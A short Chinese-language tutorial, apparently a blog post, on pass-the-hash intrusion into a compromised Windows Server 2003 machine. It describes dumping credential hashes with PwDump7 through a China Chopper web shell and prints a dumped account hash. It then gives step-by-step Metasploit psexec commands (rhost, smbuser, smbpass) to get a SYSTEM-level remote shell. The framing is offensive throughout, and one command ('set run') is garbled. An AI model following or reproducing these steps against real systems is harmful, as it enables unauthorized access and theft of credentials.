有的时候当我们拿到系统管理员hash由于密码复杂度过高无法破解时候可以利用hash直接进行远程登录
我们用到Metasploit里面的模块 肉鸡为windwos server 2003 x32系统
1.利用抓哈希工具PwDump7.exe获取哈希
菜刀输入打开命令执行 PwDump7.exe>>1.txt
获取的哈希
huwei:1010:759B9B71AEA7EE2779B6D67AACF4A147:165CD69A960EEF608596914B58F6DF82:::
这一段就是hash值165CD69A960EEF608596914B58F6DF82
放入放到md5解码里面没解出来
放到彩虹表里面也没跑出来
这个时候可以利用msf 了
打开kali 终端输入命令
msfconsole
输入模块利用
use exploit/windows/smb/psexec
show options 查看当前需要填写的信息
set rhost 肉鸡ip
set smbuser huwei
set smbpass 759B9B71AEA7EE2779B6D67AACF4A147:165CD69A960EEF608596914B58F6DF82
set run
shell
会反弹一个system权限cmdshell